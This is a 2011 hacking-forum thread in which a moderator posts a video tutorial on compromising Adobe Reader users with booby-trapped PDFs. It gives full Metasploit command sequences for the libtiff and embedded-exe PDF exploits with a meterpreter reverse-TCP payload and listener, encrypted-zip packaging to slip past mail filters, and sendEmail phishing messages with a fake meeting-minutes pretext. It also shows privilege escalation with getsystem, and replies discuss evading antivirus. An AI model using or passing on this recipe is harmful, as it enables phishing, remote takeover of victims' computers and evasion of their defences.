Results 1 to 6 of 6

Thread: [Video] Metasploit Vs. Adobe PDFs

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Metasploit Vs. Adobe PDFs

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4924026
    Download video:
    http://www.mediafire.com/?h7lab2h1p1369id


    Brief Overview
    This screencast demonstrates vulnerabilities in Adobe PDF Reader. Instead of creating a mass of vulnerable files , the attacker creates two PDFs (one relies on no user interaction and crashes the reader whereas the other one require the user to click through a few warning screens, however is then presented with a document).

    The attacker emails these documents to the target (however they have to compress & encrypt the documents).


    What do I need?
    * Metasploit – (Can be found on BackTrack 4-R2). Download here
    * SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
    * A PDF document (Either create your own or can be found by using an internet search engine).
    * The target will need a vulnerable version of Adobe Reader (v9.3 for example). Download here



    Method
    * Start network services and obtain an IP address
    * Run metasploit and search for PDF exploits
    * Configure exploit and create a vulnerable file
    * Compress and encrypt PDF
    * Socially engineer an email to the target and attach file
    * Wait for target to download and open file
    * Game Over
    * Locate a "legit" PDF documentand bind with exploit
    * Compress and encrypt PDF document
    * Socially engineer an email to the target and attach file
    * Wait for target to download and open file
    * Game Over ...again


    Commands: *Due to the forums security, I'm unable to post the complete command list.*
    Code:
    start-network
    dhclient eth0
    
    msfconsole
    search pdf
    use windows/fileformat/adobe_libtiff
    info
    show options
    set FILENAME evil.pdf
    setg OUTPUTPATH /root
    setg PAYLOAD windows/meterpreter/reverse_tcp
    setg LHOST 192.168.0.33
    setg LPORT 4444
    show options
    exploit
    use exploit/multi/handler
    show options
    exploit
    
    zip meeting.zip evil.pdf
    sendEmail -f "*************************************" -t ***************************** -u "Top secret stuff" -m "Here are the minutes from the last meeting." -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass] 
    zip -e meeting.zip evil.pdf
    g0tmi1k
    g0tmi1k
    sendEmail -f "*************************************" -t ***************************** -u "Top secret stuff" -m "Here are the minutes from the last meeting. The password is: g0tmi1k" -a /root/meeting.zip -s [smtp host] -xu [smtp user] -xp [smtp pass] 
    
    #Firefox -> Google-> filetype:PDF magic ponies -> Save: good.pdf
    
    #IE -> [target's online email] -> Login -> Download FatPlayer -> Download & Open
    
    use windows/fileformat/adobe_pdf_embedded_exe
    info
    show options
    set FILENAME evil2.pdf
    #set EXENAME evil.exe   #ENCODE 
    set LAUNCH_MESSAGE Be sure to re-save when shown and then click open.  
    set INFILENAME /root/good.pdf
    show options
    exploit
    use exploit/multi/handler
    show options
    exploit -j
    
    zip -e meeting2.zip evil2.pdf
    g0tmi1k
    g0tmi1k
    sendEmail -f "*************************************" -t ***************************** -u "Top secret stuff v2" -m "If you can't open the first email, try this one.  The password is: g0tmi1k" -a /root/meeting2.zip  -s [smtp host] -xu [smtp user] -xp [smtp pass] 
    
    #IE -> [target's online email] -> Login -> Download FatPlayer -> Download & Open
    
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    getsystem
    getuid
    Walk-through
    The attacker approaches this attack similar to a previous method, however instead of producing a collection of different files, which are not going to be used, they choose to use a program which is very commonly installed (also not updated often too!), Adobe Reader.

    To start things going, the attacker starts their network connection and runs metasploit. When metasploit is ready, they search it's database for known exploits for PDFs files. "windows/fileformat/adobe_libtiff" has the latest Disclosure Date (2010-02-16) to today's date (2011-03-22). After choosing it and looking at the exploit in more detail, the attacker notes the vulnerable version of Adobe Reader (versions 8.0 - 8.2, 9.0 - 9.3) which the target HAS to have for this exploit to work.

    The attacker then proceeds to enter all the necessary information for the exploit to function, then creates the exploit when it is ready.

    Like before, the attacker chooses to socially engineer the target by sending them an email, however this time around wants they to attach the file instead of linking to it.
    The attacker enters a brief description of what the PDF is meant to contain. However, when the attacker tries to see the PDF the SMTP disallows the PDF attachment. The attacker compresses and encrypts the PDF which will prevent detection (The attacker alters the original message to include the password).


    The attacker can sit back and relax until the target opens the PDF document... which the target does =). However! When the target opens the PDF document, the reader "crashes" before they could read the document. So they email back saying they are unable to read it. The attacker then replies with the "correct" PDF...

    This time, the attacker wants to "bind" an exploit to the "legit" PDF. So after searching metasploits database, they locate "windows/fileformat/adobe_pdf_embedded_exe".

    Again, the attacker then proceds to enter all the necessary information for the exploit to function, creates the new document and delivers it using the same method as before. Just like before, there is nothing left for the attacker to do except to wait for the target to open the document...

    After the target has refreshed their inbox, they notice they have got the "correct" PDF. Upon opening the file, a "Save as" window pops up (1), and of course they wish to save the PDF or just want to read the document so they just click next... After reading the message (2), they click on "open". After doing those steps the target is able to read the document...

    ...meanwhile the exploit has worked and the attacker has another meterpreter shell on the targets machine.


    (1) This is really a meterpreter agent, NOT the PDF file which it says it was. It has cloned the filename from the PDF the attacker used
    (2) The message is what the attacker left



    Notes:
    * You will need to find/use your own SMTP details.
    * Avast anti-virus detected the PDFs (2011-03-23), other Anti-Virus may as well.
    Song: New Zealand Shapeshifter - The Touch (Netsky remix) & New Zealand Shapeshifter - Lifetime (Logistics remix)
    Video length: 9:07
    Capture length: 32:22
    Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-metasploit-vs-adobe-pdfs.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/39001-%5Bvideo%5D-metasploit-vs-adobe-pdfs.html#post192420
    Last edited by g0tmi1k; 03-27-2011 at 07:53 PM.
    Have you...g0tmi1k?

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [Video] Metasploit Vs. Adobe PDFs

    many,many,many thanks for your JOBS!

  3. #3
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    1

    Default Re: [Video] Metasploit Vs. Adobe PDFs

    Absolutely Fantastic Video.

  4. #4
    Member m0j4h3d's Avatar
    Join Date
    Jan 2010
    Posts
    84

    Default Re: [Video] Metasploit Vs. Adobe PDFs

    nice video man,gd work, but we gotta find a new way for avoiding AV from caching the .pdf file ,,, btw useful video and nice ideas
    go fw
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  5. #5
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Metasploit Vs. Adobe PDFs

    Quote Originally Posted by zimmaro View Post
    many,many,many thanks for your JOBS!
    Quote Originally Posted by NeoGeo View Post
    Absolutely Fantastic Video.
    Thanks for the thanks =)


    Quote Originally Posted by m0j4h3d View Post
    nice video man,gd work, but we gotta find a new way for avoiding AV from caching the .pdf file ,,, btw useful video and nice ideas
    go fw
    It's on my todo list - however I want to finished doing "Owning OSs" before I start on bypassing security protection
    Cheers for the feedback!
    Have you...g0tmi1k?

  6. #6
    Senior Member voidnecron's Avatar
    Join Date
    May 2010
    Posts
    132

    Default Re: [Video] Metasploit Vs. Adobe PDFs

    Great stuff again from the video tutorial master
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."

Similar Threads

  1. Replies: 17
    Last Post: 04-07-2011, 10:00 PM
  2. [Video aula] Vulnerabilidade no Adobe Reader 9.3.4(0day)
    By Bhior in forum Tutoriais e Howtos
    Replies: 3
    Last Post: 09-23-2010, 10:38 AM
  3. Exploit for the new Adobe Flash 0-Day should added to Metasploit
    By rafaeltorresrj in forum Tutoriais e Howtos
    Replies: 0
    Last Post: 06-08-2010, 04:36 PM
  4. [Blog Post] BT4, Adobe 0days and other updates (VIDEO)
    By some1 in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-11-2010, 01:28 PM
  5. Metasploit Adobe UtilPrintf Exploit
    By purehate in forum OLD Misc Tools
    Replies: 0
    Last Post: 10-01-2009, 01:33 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •